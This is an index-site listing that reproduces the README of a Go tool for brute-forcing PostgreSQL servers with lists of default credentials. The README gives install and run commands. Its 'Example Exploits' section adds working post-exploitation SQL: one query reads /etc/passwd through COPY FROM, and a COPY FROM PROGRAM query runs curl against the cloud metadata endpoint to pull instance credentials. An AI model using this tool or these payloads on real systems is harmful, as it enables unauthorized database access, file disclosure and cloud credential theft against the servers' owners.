Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/postgres-bruteforcer
This tool takes a list of default creds and tests it against a postgresql server and logs any that work and the databases it has access to.
https://github.com/randomrobbiebf/postgres-bruteforcer
Last synced: about 1 month ago
JSON representation
This tool takes a list of default creds and tests it against a postgresql server and logs any that work and the databases it has access to.
- Host: GitHub
- URL: https://github.com/randomrobbiebf/postgres-bruteforcer
- Owner: RandomRobbieBF
- Created: 2023-01-11T11:30:01.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-01-11T11:49:03.000Z (almost 2 years ago)
- Last Synced: 2024-06-21T13:57:53.887Z (6 months ago)
- Language: Go
- Size: 9.77 KB
- Stars: 1
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# postgres-bruteforcer
About
---This Go script reads a list of usernames and passwords from a file called `creds.txt` and tests them against a PostgreSQL database.
The script accepts an IP of the PostgreSQL server as a command line argument or a text file of ip's.
If an access is granted, the script writes this output to a file called `pg-output.txt`.
If the user `postgres` is avalible this is normally a super user which can allow RCE or LFI or SSRf.
How to install
---```
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
```How to run
---```
go run postgres-brute.go 1.1.1.1postgres
```
Example Exploits
----Grab `/etc/passwd/`
```
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
```SSRF - Grab AWS Metadata
```
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
```